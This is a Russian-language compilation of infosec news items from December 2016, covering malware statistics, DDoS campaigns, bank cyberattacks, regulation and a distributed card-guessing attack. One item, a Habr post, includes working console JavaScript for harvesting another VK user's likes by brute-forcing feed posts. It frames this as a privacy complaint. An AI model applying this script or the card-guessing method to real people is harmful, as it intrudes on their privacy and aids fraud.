    Как пояснил ведущий автор исследования Мохаммед Али (Mohammed Ali), атака подобного рода эксплуатирует две уязвимости, которые сами по себе не представляют особой опасности, но при комбинированном использовании представляют серьезную угрозу для всей платежной системы. Прежде всего, современные системы электронных платежей не фиксируют неудачные попытки платежа на разных web-сайтах. Таким образом, возможно бесконечно перебирать варианты для каждого из реквизитов карты, используя количество разрешенных сайтом попыток (обычно 10 или 20). Во-вторых, различные сайты запрашивают разные реквизиты для подтверждения покупки. То есть, собрать фрагменты информации и сложить их вместе - довольно просто, отмечает Али.

    С помощью одного верно угаданного поля подбираются другие. Если посылать запросы одновременно на множество сайтов, можно получить положительные ответы на каждый из них в течение двух секунд.

    Для получения данных кредитных карт атака распределенного перебора использует интернет-магазины. Перебираются разные варианты и в зависимости от реакции сайта на попытку осуществить транзакцию, определяется правильный вариант.

    По словам исследователя, при помощи данной атаки довольно легко взломать платежную систему VISA. Система никак не реагирует на неудачные попытки платежа, предпринятые на разных сайтах с использованием одной и той же карты. Централизованная сеть MasterCard смогла распознать атаку методом перебора менее чем за десять попыток, даже в тех случаях, когда платежи были распределены по нескольким сетям.

    orig: 2016-12-05 11:48:40 / http://www.securitylab.ru/news/484644.php (click post title)



    Нижний Новгород: конечная остановка в путешествии «Код ИБ»

    Даже не верится, что позади было столько всего. Но не стоит грустить, ведь в новом году нас ждет еще больше стран, городов, участников и впечатлений. А пока хотим рассказать о конечной остановке на карте путешествия «Код ИБ». 24 ноября конференция вот уже в восьмой раз прошла в Нижнем Новгороде. В качестве площадки проведения в этом году был выбран Конгресс-отель «Маринс Парк Отель».

    Уже ставшая традиционной вводная дискуссия «Тренды и угрозы сферы ИБ» дала старт дню конференции. Ключевые спикеры в лице Алексея Лукацкого (Cisco), Максима Степченкова (IT-Task), Ильи Борисова (ThyssenKrupp Industrial Solutins), Андрея Прозорова (Solar Security) и Владимира Дубровина (MailRu.Group) обсудили со слушателями будущее и настоящее отрасли, а также последние новости из мира информационной безопасности.

    Затем, после небольшого перерыва кофе-брейк, началась работа секций. Конференция разделилась на два потока, благодаря чему участники смогли выбрать наиболее интересную для себя тему: защита от внешних или же внутренних угроз. Не обошлось и без третьей части, после обеда конференция снова слилась в один поток, и началась работа секций «Тренды и угрозы сферы ИБ».

    Мы , как организаторы, знаем, что именно Алексея Лукацкого, известного в сфере ИБ бизнес-консультанта и блогера, участники «Код ИБ» особенно ждут в каждом из городов. Что ж, нижегородцы, вам повезло! В завершение дня Алексей провел свой авторский мастер- класс «Обнаружение необнаруживаемого. Как идентифицировать неизвестные угрозы?».

    Розыгрыш призов, закрытие, довольные улыбки участников. И вот последняя в этом году конференция «Код информационной безопасности» уже подходит к концу. Но мы обязательно встретимся вновь уже в новом, 2017 году! Впереди нас ждет еще больше актуальной информации, новые лица и знакомства, встреча с интересными спикерами, обсуждение актуальных и злободневных тем из сферы ИБ, а также масса положительных эмоций и впечатлений. До встречи!

    Благодарим компании Axoft и Positive Technologies за помощь и поддержку в подготовке конференции!

    Также выражаем благодарность нашим партнерам и спонсорам за поддержку в организации и проведении конференции:

    спонсоров секций:
    InfoWatch, Ростелеком, Axoft, Positive Technologies,

    докладчиков:
    Cisco, IT-Task, ThyssenKrupp Industrial Solutions, MailRu.Group, Check Point, Ростелеком, Доктор Веб, Microsoft, НТБ, InfoWatch, SearchInform, Solar Security, Актив, Positive Technologies, СОНЕТ, Лаборатория Касперского, АЛТЭКС-СФОТ,


    Wi-Fi-партнера:

    АВК-системы,

    наших медиа-партнеров:
    Anti-Malware (генеральный медиа-партнер), 3DNews (эксклюзивный медиа-партнер), Директор по безопасности (стратегический информационный партнер), Avtoritet.net (отраслевой медиа-партнер), RISSPA, BIS Journal, GlobalCIO, ПРОБИЗНЕС, BISA, SecandSafe, InformationSecurity, RUБЕЖ, iso27000.ru, ITMozg, Системный администратор, Бизнес&Информационные технологии, Comprice.ru, Единый портал электронной подписи, TERRAV.RU, Softpressrelase, Айти-событие.рф, 12NEWS, ITVDN, CyberBionic, Numeralis, StorageNews, Безопасность для всех, ПЛАС, Retail&Loyalty, SecureNews, Блог Царева Евгения, РУ-СФЕРА, DailyComm, Hotwork, Весь компьютерный мир Санкт-Петербурга, ICT-ONLINE, Вопросы кибербезопасности, ID Expert, NBJ, Банковское обозрение, TERRA-EXPO, ASMO.ru, Клуб ИТ-директоров CIO.NN, Нижегородское IT-сообщество.


    ВПЕЧАТЛЕНИЯ УЧАСТНИКОВ:

    «Конференция понравилась, особо хочу отметить дискуссию между профессионалами, а также разбор вопросов и сравнение систем DLP»
    Дмитрий Сальников, начальник отдела ИТ, ИГПУ им. И. Минина

    «Очень понравилось, приятная атмосфера, интересные люди»

    Евгений Завричко, инженер, НИИИС

    «Все отлично, хороший материал выступлений. Смог почерпнуть для себя новое. Хорошая организация»

    Иван Емельяненко, ведущий специалист ИТ, Нижегородский машиностроительный завод

    «Были очень интересные выступления и, главное, очень полезные. Конкретные темы в отличие от массы проводимых в последнее время традиционных семинаров, совершенно бесполезных, носящих чисто рекламный характер»

    Юрий Юрченко, начальник ИТ-отдела, АО «ОКБМ Африкантов»

    «Хорошая конференция. Сравнительно небольшое количество участников позволяет докладчикам пообщаться со всеми желающими. Уменьшение количества рекламы положительно сказывается на качестве докладов и делает конференцию не только полезной, но и интересной»

    Алексей Семеночев, ведущий инженер по ИТ, АО «ОКБМ Африкантов»

    «Интересное событие в моем городе. Каждый год с интересом посещаю. Спасибо, что не забываете о регионах»

    Максим Залесских, ведущий специалист отдела ИБ, АО «ГЛОБЭНСБАНК»

    «Отличная организация конференции, очень понравилась живая беседа с выст»

    Валентин Жирнов, инженер по оборудованию, НЦТД

    orig: 2016-12-05 10:54:27 / http://www.iso27000.ru/novosti-i-sobytiya/nizhnii-novgorod-konechnaya-ostanovka-v-puteshestvii-kod-ib (click post title)



    Check Point отметил рост количества кибератак и вредоносных программ на 5%

    Команда исследователей Check Point обнаружила, что и количество вредоносных семейств, и количество атак выросло на 5%. Объем атак на бизнес в октябре достиг своего пика, по сравнению со всеми предыдущими месяцами 2016 года. Продолжает расти число атак с вымогателем Locky, поэтому в октябре он перемещается с третьего на второе место среди наиболее часто используемых видов вредоносного ПО. Причина популярности Locky — постоянное появление его модификаций и механизм распространения преимущественно через спам-рассылку. Создатели Locky меняют тип файлов, используемых для загрузки вымогателя (doc, xls и wsf файлы), а также вносят значительные структурные изменения в спам-письма. Сам по себе вымогатель не является чем-то исключительным, но киберпреступники затрачивают много времени, чтобы заразить как можно больше компьютеров. В топ-3 также возвращается банковский троян Zeus.

    1. ↔ Conficker — Использовался в 17% зарегистрированных атак. Червь, обеспечивающий удаленное исполнение операций и загрузку вредоносного ПО. Инфицированный компьютер управляется ботом, который обращается за получением инструкций к своему командному серверу.

    2. ↑ Locky — Вымогательское ПО, появившееся в феврале 2016 года. Распространяется в основном через спам-письма, содержащие инфицированный Word или Zip файл, который загружает и устанавливает вредоносное ПО, шифрующее пользовательские файлы. Зарегистрирован в октябре в 5% известных атак.

    3. ↑ Zeus  — Также отмечен в 5% обнаруженных атак. Троян, который атакует Windows-платформы и часто используется для кражи банковской информации посредством захвата введенных учетных данных (формграббера) и кейлоггинга

    Количество атак на Россию в октябре значительно уменьшилось, что позволило ей опуститься с 52 на 101 место. Атаки на компании на территории страны проводились с использованием таких вредоносных программ, как InstalleRex, Conficker, Kometaur, Ramnit, Cryptoload, Dorkbot, Cryptowall, Locky, Bancos и Sality. Больше всех в прошлом месяце атаковали Ботсвану, Уганду и Замбию, а меньше всех зарегистрированных атак было на Уругвай, Аргентину и Доминиканскую Республику. 

    Мобильные зловреды продолжают подвергать бизнес значительной опасности: 15 из 200 видов вредоносного ПО атакуют именно мобильные устройства. Также в течение последних семи месяцев HummingBad, вредоносное ПО для Android, остается самым используемым для атак на мобильные устройства.

    Три наиболее часто используемых вида мобильных угроз в октябре:

    1. ↔ HummingBad — Вредоносное ПО для Android, которое, используя устойчивый к перезагрузке руткит, устанавливает мошеннические приложения и с небольшими модификациями может проявлять дополнительную вредоносную активности, включая установку программных клавиатурных шпионов, кражу учетных данных и обход зашифрованных email-контейнеров, используемых компаниями.

    2. ↔ Triada — Модульный бэкдор для Android, который дает повышенные привилегии загруженным зловредам, поскольку помогает им внедриться в системные процессы. Triada также была замечена в подмене URL-адресов, загруженных в браузере.

    3. ↑ XcodeGhost — Компрометированная версия платформы разработчиков iOS Xcode. Эта неофициальная версия Xcode изменена так, что она может внедрять вредоносный код в приложение, которое разработано и скомпелировано с ее помощью. Внедренный код отправляет информацию о приложении на командный сервер, позволяя инфицированному приложению считывать данные из буфера обмена устройства.

    «Тот факт, что топ-10 вредоносных программ остается без изменений с сентября, позволяет нам предполагать, что киберпреступники довольны их действием. А для компаний это сигнал, что им нужно реагировать проактивно, чтобы защищать свои критические бизнес-активы. Эффективность таких программ, как Conficker, говорит также о том, что пока компании не используют защиту необходимого уровня, — комментирует Василий Дягилев, глава представительства Check Point Software Technologies. — Чтобы защитить себя, бизнесу необходим комплексный подход и меры продвинутой защиты  сетей, конечных и мобильных устройств, чтобы остановить вредоносное ПО еще до заражения.  Это возможно с такими решениями, как Check Point’s SandBlast™ Zero-Day Protection и Mobile Threat Prevention, которые способны противостоять новейшим угрозам».

    Информация для отчета Threat Index основана на данных, предоставляемых ThreatCloud World Cyber Threat Map,  которая отображает место и время атак по всему миру в режиме реального времени. Данные для Threat Map предоставлены Check Point’s ThreatCloudTM — крупнейшей сетью для совместной борьбы с киберпреступлениями, которая собирает данные об атаках с помощью глобальной сети датчиков угроз. База данных ThreatCloud содержит более 250 миллионов адресов, анализируемых на наличие ботов, более 11 миллионов сигнатур вредоносного ПО и более 5,5 миллионов адресов зараженных веб-сайтов. Каждый день система обнаруживает свыше одного миллиона типов вредоносного ПО.

    Информация о предотвращении угроз компании Check Point доступна на сайте:    http://www.checkpoint.com/threat-prevention-resources/index.html

    orig: 2016-12-05 10:47:46 / http://www.iso27000.ru/antivirusnyi-vestnik/check-point-otmetil-rost-kolichestva-kiberatak-i-vredonosnyh-programm-na-5 (click post title)



    Неизвестный ботнет ежедневно атакует пользователей в США

    Пиковая мощность DDoS-атак составляет 400 Гб/с и выше.

    Неизвестные злоумышленники используют массивный ботнет для осуществления ежедневных DDoS-атак, направленных на небольшое количество объектов в США.

    Кампания продолжается с 23 ноября нынешнего года. По данным экспертов компании CloudFlare, атаки не связаны с вариантом вредоносного ПО Mirai, в последние несколько месяцев использовавшегося для создания ботнетов и осуществления похожих DDoS-атак.

    Специалисты отмечают не только масштаб, но и мощность зафиксированных атак (DDoS Layer 3&4 по модели OSI) - пиковая мощность мусорного трафика составляла 400 Гб/с и выше. Эксперты также заметили одну интересную особенность - во всех случаях атаки начинались в одно и то же время время и длились 8-8,5 часов. Однако в последние несколько дней продолжительность атак возросла до 24 часов.

    В настоящее время тип ботнета, используемого в атаках, неизвестен. По мнению экспертов, речь может идти о бот-сети, состоящей из IoT-устройств.

    Напомним, ранее клиенты британского интернет-провайдера Talktalk Telecom Group PLC и немецкой компании Deutsche Telekom испытали проблемы с доступом в интернет. Причиной сбоя в работе стали маршрутизаторы, инфицированные новым вариантом вредоносного ПО Mirai.

    orig: 2016-12-05 10:34:08 / http://www.securitylab.ru/news/484643.php (click post title)



    Check Point отметил рост количества кибератак и вирусов на 5%

    Команда исследователей Check Pointinfo-icon обнаружила, что и количество вредоносных семейств, и количество атак выросло на 5%. Объем атак на бизнес в октябре достиг своего пика, по сравнению со всеми предыдущими месяцами 2016 года.

    Продолжает расти число атак с вымогателем Locky, поэтому в октябре он перемещается с третьего на второе место среди наиболее часто используемых видов вредоносного ПО. Причина популярности Locky — постоянное появление его модификаций и механизм распространения преимущественно через спам-рассылку. Создатели Locky меняют тип файлов, используемых для загрузки вымогателя (doc, xls и wsf файлы), а также вносят значительные структурные изменения в спам-письма. Сам по себе вымогатель не является чем-то исключительным, но киберпреступники затрачивают много времени, чтобы заразить как можно больше компьютеров. В топ-3 также возвращается банковский троян Zeus.

  • Conficker— Использовался в 17% зарегистрированных атак. Червь, обеспечивающий удаленное исполнение операций и загрузку вредоносного ПО. Инфицированный компьютер управляется ботом, который обращается за получением инструкций к своему командному серверу.
  • Locky— Вымогательское ПО, появившееся в феврале 2016 года. Распространяется в основном через спам-письма, содержащие инфицированный Word или Zip файл, который загружает и устанавливает вредоносное ПО, шифрующее пользовательские файлы. Зарегистрирован в октябре в 5% известных атак.
  • Zeus — Также отмечен в 5% обнаруженных атак. Троян, который атакует Windows-платформы и часто используется для кражи банковской информации посредством захвата введенных учетных данных (формграббера) и кейлоггинга
  • Количество атак на Россию в октябре значительно уменьшилось, что позволило ей опуститься с 52 на 101 место. Атаки на компании на территории страны проводились с использованием таких вредоносных программ, как InstalleRex, Conficker, Kometaur, Ramnit, Cryptoload, Dorkbot, Cryptowall, Locky, Bancos и Sality. Больше всех в прошлом месяце атаковали Ботсвану, Уганду и Замбию, а меньше всех зарегистрированных атак было на Уругвай, Аргентину и Доминиканскую Республику. 

    Мобильные зловреды продолжают подвергать бизнес значительной опасности: 15 из 200 видов вредоносного ПО атакуют именно мобильные устройства. Также в течение последних семи месяцев HummingBad, вредоносное ПО для Androidinfo-icon, остается самым используемым для атак на мобильные устройства.

    Три наиболее часто используемых вида мобильных угроз в октябре:

  • HummingBad— Вредоносное ПО для Android, которое, используя устойчивый к перезагрузке руткит, устанавливает мошеннические приложения и с небольшими модификациями может проявлять дополнительную вредоносную активности, включая установку программных клавиатурных шпионов, кражу учетных данных и обход зашифрованных email-контейнеров, используемых компаниями.
  • Triada— Модульный бэкдор для Android, который дает повышенные привилегии загруженным зловредам, поскольку помогает им внедриться в системные процессы. Triada также была замечена в подмене URL-адресов, загруженных в браузере.
  • XcodeGhost— Компрометированная версия платформы разработчиков iOS Xcode. Эта неофициальная версия Xcode изменена так, что она может внедрять вредоносный код в приложение, которое разработано и скомпелировано с ее помощью. Внедренный код отправляет информацию о приложении на командный сервер, позволяя инфицированному приложению считывать данные из буфера обмена устройства.
  • «Тот факт, что топ-10 вредоносных программ остается без изменений с сентября, позволяет нам предполагать, что киберпреступники довольны их действием. А для компаний это сигнал, что им нужно реагировать проактивно, чтобы защищать свои критические бизнес-активы. Эффективность таких программ, как Conficker, говорит также о том, что пока компании не используют защиту необходимого уровня, — комментирует Василий Дягилев, глава представительства Check Point Software Technologies. — Чтобы защитить себя, бизнесу необходим комплексный подход и меры продвинутой защиты  сетей, конечных и мобильных устройств, чтобы остановить вредоносное ПО еще до заражения.  Это возможно с такими решениями, как Check Point’s SandBlast™ Zero-Day Protection и Mobile Threat Prevention, которые способны противостоять новейшим угрозам».

    Информация для отчета Threat Index основана на данных, предоставляемых ThreatCloud World Cyber Threat Map,  которая отображает место и время атак по всему миру в режиме реального времени. Данные для Threat Map предоставлены Check Point’s ThreatCloudTM — крупнейшей сетью для совместной борьбы с киберпреступлениями, которая собирает данные об атаках с помощью глобальной сети датчиков угроз. База данных ThreatCloud содержит более 250 миллионов адресов, анализируемых на наличие ботов, более 11 миллионов сигнатур вредоносного ПО и более 5,5 миллионов адресов зараженных веб-сайтов. Каждый день система обнаруживает свыше одного миллиона типов вредоносного ПО.

    orig: 2016-12-05 08:03:26 / https://www.anti-malware.ru/news/2016-12-05/21615 (click post title)



    Великобритания: Конференция «Работа над изменениями: Новые подходы и будущая практика обеспечения долговременной электронной сохранности»


    30 ноября и 1 декабря 2016 года в Лондоне проходила международная встреча-конференция «Работа над изменениями: Новые подходы и будущая практика обеспечения долговременной электронной сохранности» (Acting on Change: New Approaches and Future Practices in LTDP), в работе которой принял участие ряд ведущих мировых экспертов в области электронной сохранности.

    Конференция была совместно организована финансируемым Евросоюзом проектом «Продвижение и способствование повторному использованию информации на протяжении жизненного цикла контента с учетом эволюции семантики», или «Перикл» (Promoting and Enhancing Reuse of Information throughout the Content Lifecycle taking account of Evolving Semantics, PERICLES, http://pericles-project.eu/ ) и британской Коалицией по электронной сохранности (Digital Preservation Coalition, DPC, http://dpconline.org/ ). За работой конференции можно было следить в Твиттере, ориентируясь на хештег #PERIconf2016.

    На сайте конференции ( http://pericles-project.eu/page/PERICLESconference2016 - здесь же выложена программа) о ней было сказано следующее:

    «Обеспечение долговременной сохранности электронных объектов, а также их непрерывной доступности, использования и повторного использования в течение длительного времени в условиях быстро меняющейся электронной среды в последние годы все чаще становится приоритетной задачей для многих организаций и отраслей. Воздействия изменений – как технологические, так и семантические и культурные -  потребовали проведения исследований с целью выработки решений, подходящих для ряда различных сред и методов обеспечения сохранности.»

    «Данная конференция позволит внимательно посмотреть, какие именно проводятся исследования в связи с проблемами, возникающими вследствие изменения условий, и какие предлагаются решения в помощь действующим в этой области специалистам-практикам. Новые партнерства между представителями различных дисциплин позволили выработать интересные точки зрения и дали идеи, стимулирующие разработку новых подходов к управлению изменениями в электронно-цифровой среде и к реагированию на них.»

    С пленарным докладом «Видеть лес за деревьями: Взгляд за рамки эталонной модели OAIS» (Seeing the forest for the trees: A look outside the OAIS reference model) выступает  Кара ван Мальсен (Kara Van Malssen) из компании AVPreserve (США)
    Кара говорит о типичных пробелах при решении задачи долговременной сохранности – отсутствии/неполноте политик, отсутствии централизованного контроля, избыточном бремени, ложащемся на создателей контента; изолированности друг от друга усилий в данной области; неразвитой инфраструктуре и отсутствии соответствующих полномочий
    «В рамках финансируемого Евросоюзом исследовательского проекта «Перикл» (2013-2017) разрабатывается подход, который охватит как активную фазу существования электронных объектов, так и влияние изменений на способность обеспечить сохранность электронных объектов и данных. Консорциум участников проекта приглашает Вас присоединиться к нам на этой конференции, чтобы обсудить подходы и решения, отражающие различные точки зрения, контексты и практики, предлагаемые не только проектом «Перикл», но целым рядом других проектов и инициатив.»

    «Конференция будет проходить в течение двух дней, 30 ноября и 1 декабря 2016 года. Запланирован ряд панельных дискуссий и семинаров, посвященных ключевым вопросам и темам конференции. Вечером 30 ноября Коалицией по электронной сохранности (DPC) проведет церемонию вручения престижных наград «Сохранение электронного наследия 2016» (Digital Preservation Awards 2016).»

    Панельная дискуссия на тему «Что за рамками модели OAIS?». В роли модератора выступает Уильям Килбрайд (William Kilbride, DPC). Эксперты: Кара ван Мальсен, Анжела Дапперт (Angela Dappert, Британская библиотека); Барбара Сирман (Barbara Sierman, Национальная библиотека Голландии), Барбара Рид (Barbara Reed, компания Recordkeeping Innovation) и Пип Лоренсон (Pip Laurenson, галерея Тейт/ «Перикл»)
    Барбара Сирман: Не является ли модель OAIS для нас клеткой?
    Вслед за конференцией в третий день (2 декабря) был проведен семинар «Передача технологий» (Technology Transfer workshop) для поставщиков ИТ-решений и разработчиков программного обеспечения.

    Записанные доклады предполагается выложить на канале конференции на сайте YouTube (  https://www.youtube.com/channel/UC1_d3JCWJHuHk5afIOas7Bg ).

    Лауреаты премии «Сохранение электронного наследия 2016»
    Источник: сайт конференции
    http://pericles-project.eu/page/PERICLESconference2016

    orig: 2016-12-05 08:00:12 / http://rusrim.blogspot.com/2016/12/blog-post_80.html (click post title)



    Роскомнадзор отвел Google три месяца на создание российского юрлица

    В 2017 году владельцы новостных агрегаторов будут внесены Роскомнадзором в специальный реестр.

    Роскомнадзор предоставит иностранным компаниям, владеющим новостными агрегаторами, три месяца нового года для регистрации юридического лица в России. Главным образом речь идет о компании Google, которая должна будет изменить форму присутствия на российском рынке в соответствии с законодательством РФ, пишут «Известия».

    По данным издания, в 2017 году Роскомнадзор внесет владельцев новостных агрегаторов в специальный реестр на основании либо мониторинга, либо обращения гражданина или организации. Список будет включать только крупнейшие агрегаторы с трафиком, превышающим 1 млн посетителей в сутки.

    Как рассказал пресс-секретать Роскомнадзора Вадим Ампелонский, если владельцем новостного агрегатора является иностранная компания, в ее распоряжении будет три месяца для регистрации юридического лица на территории РФ.

    В России всего крупных новостных агрегатора, принадлежащих зарубежным компаниям - Google.com и Bing.com. Владельцем первого является компания Google. У американского техногиганта в России уже есть юрлицо (ООО «Гугл»), однако по данным ЕГРЮЛ (единый государственный реестр юрлиц), основная сфера деятельности компании - рекламная. Как пояснил начальник юридического отдела координационного центра национального домена сети Интернет (КЦ) Сергей Копылов, юридическое лицо должно соответствовать требованиям в законе, а указанная рекламная деятельность не подходит для деятельности новостного агрегатора.

    Bing.com принадлежит корпорации Microsoft, владеющей в России компанией «Майкрософт Рус». В  основных видах деятельности компании фигурируют разработка ПО и консультации в данной области, а также  деятельность по созданию и использованию баз данных и информационных ресурсов, в том числе ресурсов сети Интернет. По мнению Копылова, для Bing.com может подойти «Майкрософт Рус», а вот корпорации Google придется либо внести изменения в регистрационные данные ООО «Гугл», либо создать новое юридическое лицо на территории России.

    При регистрации компании в соответствии с федеральным законом «О государственной регистрации юридических лиц и индивидуальных предпринимателей» в ЕГРЮЛ вносятся виды деятельности в соответствии с общероссийским классификатором видов экономической деятельности (ОКВЭД), которыми компания планирует заниматься. Нарушение данного порядка может быть чревато наказанием в виде административной ответственности по ст. 14.25 КоАП РФ (штраф до 5 тыс. рублей), поясняют «Известия».

    Напомним, закон о новостных агрегаторах вступает в действие с 1 января 2017 года. В числе прочего новый закон обязывает владельцев новостных агрегаторов в течение полугода хранить размещенную агрегатором информацию и удалять не соответствующие требованиям закона новости по обращению Роскомнадзора.

    orig: 2016-12-05 07:44:47 / http://www.securitylab.ru/news/484642.php (click post title)



    Минкомсвязи и ЦБ РФ проинструктировали банки на случай кибератак

    Регуляторы провели встречи с представителями операторов связи и финансовых организаций.

    В связи с предупреждением ФСБ о готовящихся кибератаках на российские финансовые организации Минкомсвязи РФ провело совещание с представителями телекоммуникационных компаний и банков. В ходе встречи были разработаны меры на случай хакерских атак.

    Как сообщает издание «РИА Новости» со ссылкой на пресс-службу министерства, Минкомсвязи сотрудничает с ФСБ по вопросу противодействия кибератакам на российский финансовый сектор. В общей сложности состоялось два совещания с операторами связи и крупными банками. Также были подготовлены и разосланы инструкции о необходимых мерах на случай кибератак и о порядке обращения в министерство и ФСБ.

    Свои рекомендации по противостоянию хакерским атакам также дал Центр мониторинга и реагирования на компьютерные атаки в кредитно-финансовой сфере (ФинЦЕРТ) Банка России. По словам представителей финорганизации, ситуация находится под контролем. ЦБ РФ владеет всем объемом информации о происходящем и находится в постоянном взаимодействии с правоохранительными органами и силовыми структурами.

    Напомним, 2 декабря текущего года ФСБ опубликовала на своем сайте предупреждение о возможных атаках хакеров на финансовый сектор, запланированные на 5 декабря. В связи с угрозой DDoS-атак в ночь на 5 декабря были отключены банкоматы ряда банков в Крыму.

    orig: 2016-12-05 07:41:58 / http://www.securitylab.ru/news/484641.php (click post title)



    Смотрим часть чужого избранного ВКонтакте


    Кадры из фильма «50 оттенков серого»

    На этот раз с помощью незамысловатого куска кода на javascript заглянем в таинственные глубины человеческих предпочтений. А именно получим часть списка закладок («лайков» записей сообществ) аккаунта ВКонтакте.

    По данным wordstat.yandex.ru, до 2000 раз в месяц у поискового робота спрашивают «как посмотреть кто что лайкает». Ответом в поисковой выдаче является вирусная программка LikeCheсker, которая на поставленный вопрос на самом деле не отвечает. А мы ответим.

    Зачем это нужно? Если верить интернету (а ему лучше не верить) по, например, почерку человека можно определить его характер. Например

    Саркастичных людей можно распознать по написанию буквы «ё». Чем необычнее изображение точек, помещенных над этой буквой, тем острее его чувство юмора и ярче его способность к подражанию.
    Есть у меня предположение, что по картинкам и постам, которые человек «лайкает» можно построить более точный портрет личности, чем по его почерку. Однако для получения этой информации нужно немного потрудиться.

    Описание ситуации
    ВКонтакте
    Раньше информация о том какие записи пользователь отмечает сердечком была полностью конфиденциальна и видна только самому пользователю. После очередного редизайна конфиденциальность пропала. Если пользователь А является другом пользователя Б и они подписаны на одно и то же сообщество, то он может узнать под конкретной записью этого сообщество «лайкнул» ли её пользователь Б.

    В случае десктопной версии VK.com информация о том, что пользователь Б её «лайкнул» отображается в виде его аватара, если навести мышку на сердечко:


    Постановка задачи
    Нашей целью будет получить список записей, которые пользователь отметил сердечком. Не знаю можно ли с помощью VK API добраться до этой информации (беглым взглядом по документации такой возможности не обнаружил) мы пойдём простым путём — через браузер.

    Итак, для того, чтобы получить список чужого избранного нам нужно:

    • Быть с жертвой друзьями в ВК
    • Подписаться на те же сообщества что и он
    • Пробрутфорсить все записи сообществ

    С первым пунктом всё понятно, второй и третий будем автоматизировать.К делу
    Чтобы не трогать реально существующих друзей зарегистрируем два аккаунта и подружим их.
    Тратим 30 рублей, покупаем две виртуальные симки (без телефона VK не регистрирует) и регистрируем героев фильма «50 оттенков серого»:

    Аккаунтом Грея пользуемся как обычно — подписываемся вручную на разные сообщества и отмечаем «лайками» различные записи в ленте.

    Из аккаунта Анастейши начинаем охоту на «Лайки». Помогать нам сегодня будет Javascript. Можно использовать букмарклеты, можно сделать Google Extension. Мы пойдём по-простому, через Developer Console (F12).

    1. Получаем список сообществ на странице жертвы:

    var x = document.getElementsByClassName("module_body clear_fix");
    for (var i = 0; i < x[1].children.length; i++) {
       console.log(x[1].children[i].children[0].children[0].href + " " + x[1].children[i].innerText)
    }

    2. Подписаться на них можно вот так:
    document.location="https://vk.com/sci";
    document.getElementById("public_subscribe").click()

    3. Открываем новостную ленту и прокручиваем n раз:
    document.getElementById("show_more_link").click();
    

    4. Брутфорс записей в ленте:
    var z = document.getElementsByClassName("post_like _like_wrap")
    for (var k= 0; k< z.length; k++){
    	z[k].onmouseover();
    	z[k].focus();
    }
    var y = document.getElementsByClassName("like_tt_owners me_hidden _content")
    	for (var j= 0; j< y.length; j++){
    		for (var i = 0; i < y[j].children.length; i++) {
    		 if (y[j].children[i].title == "Кристиан Грей"){
    			console.log( "https://vk.com/feed?w=wall" + z[j].onmouseover.toString().split("'")[1]);
    		  }
    		}
    	}

    Результат:

    Успех!

    Заключение
    «It's not a bug — it's a feature» скажите вы и возможно я с вами соглашусь, но мне бы хотелось видеть в настройках приватности галочку выключения такой «feature».

    Конечно, эта информация не прям такая личная и её трудно использовать против человека. Тем не менее я уверен, что бывают случаи, когда такой анализ, в дополнение к чему либо или самостоятельно поможет понять мысли человека, его характер, политические, религиозные взгляды и прочее. Повторюсь — не для всех и не всегда.

    orig: 2016-12-05 07:34:20 / https://habrahabr.ru/post/316562/ (click post title)



    Скотланд-Ярд нашел простой способ обхода экрана блокировки iPhone

    Полицейские выдергивают смартфон из рук подозреваемого во время разговора и не дают экрану заблокироваться.

    Пока во всем мире идет борьба за шифрование, и Apple ведет ожесточенные споры с ФБР по поводу разблокировки iPhone своих пользователей, сотрудники британских правоохранительных органов нашли простой способ обхода шифрования.

    Метод, впервые примененный Скотланд-Ярдом, заключается в следующем. Полицейские выслеживают подозреваемого, пока тот идет по улице, и ждут, когда он достанет и разблокирует свой смартфон. Далее правоохранители в буквальном смысле грабят преследуемого, отбирая у него устройство. Они пролистывают экран за экраном, удерживая смартфон в активном состоянии до тех пор, пока он не будет передан на криминалистическую экспертизу.

    Как сообщает BBC, подобная тактика использовалась сотрудниками Скотланд-Ярда в июне текущего года в ходе операции Operation Falcon по расследованию крупного мошенничества с банковскими картами. По данным полицейских, главный подозреваемый в деле о подделке кредитных карт Габриэль Йеу (Gabriel Yew) использовал iPhone для связи с остальными участниками преступной группировки.

    В случае ареста Йеу мог заблокировать устройство и отказаться предоставить правоохранителям хранящиеся на нем данные. Согласно закону, полицейские не могут силой заставить подозреваемого приложить свой палец к встроенному в iPhone датчику для разблокировки, а от заблокированного смартфона им было бы мало толку. Поэтому сотрудники Скотланд-Ярда выследили Йеу, дождались, когда он начнет звонить по телефону, и попросту выхватили устройство прямиком из его рук.

    В итоге полученные с изъятого iPhone данные оказались решающими для прокуратуры. Благодаря им правоохранители раскрыли преступную схему, вынесли обвинения еще четырем преступникам и вычислили сто потенциальных подозреваемых.

    orig: 2016-12-05 06:39:41 / http://www.securitylab.ru/news/484640.php (click post title)



    МВД Германии создаст специальный отдел для борьбы с хакерами

    В министерстве внутренних дел ФРГ намерены создать подразделение IT-специалистов для противодействия кибератакам на ключевые объекты инфраструктуры. Об этом сообщает издание Frankfurter Allgemeine Zeitung.

    Отмечается, что такое подразделение может быть создано в течение двух-трёх лет.

    Предполагается, что специалисты будут только отвечать на возможные кибератаки.

    По словам экспертов, в случае кибератаки на атомную станцию или систему водоснабжения необходимо будет вывести из строя серверы хакеров за рубежом. Отмечается, что страна должна иметь такую возможность, если государство, с территории которой происходит атака, не готово к сотрудничеству, пишет russian.rt.com.

    orig: 2016-12-05 05:55:41 / https://www.anti-malware.ru/news/2016-12-05/21611 (click post title)



    Банки потеряли около 2 млрд рублей из-за хакеров

    По сведениям Главного управления безопасности и защиты информации Банка России, в 2015 году ущерб от кибератак мог составить около 5 млрд рублей, но большую часть атак пресекли. Тем не менее хакерам удалось похитить со счетов российских банков более 2 млрд рублей ($26 млн).

    Несмотря на внушительную цифру, первый зампред ЦБР Ксения Юдаева охарактеризовала ущерб как «тысячные доли процента» в масштабе всей банковской системы.

    В начале 2016 года российские банки подверглись целевым атакам, направленным на подмену учетных записей для АРМ КБР (автоматизированное рабочее место клиента Банка России). Авторы атак совокупно пытались похитить 2,87 млрд рублей с корреспондентских счетов, открытых в Банке России.

    В целом за год, по данным ЦБ, удалось предотвратить хищение 1,67 млрд рублей; из них 1,1 млрд рублей в настоящее время временно заблокированы банками, в которых открыты подставные счета для вывода денежных средств.

    ЦБР не будет компенсировать банкам потери с их корреспондентских счетов.

    В 2015 году FinCERT при ЦБ России активно взялся за повышение уровня кибербезопасности российской финансовой системы и в июле 2016 года подвел итоги первого года работы. По данным FinCERT, было зафиксировано более 20 масштабных кибератак на платежные системы. Благодаря действиям центра и правоохранителей удалось предотвратить кражу более 1,5 млрд рублей. Возбуждено 12 уголовных дел, члены нескольких преступных группировок задержаны.

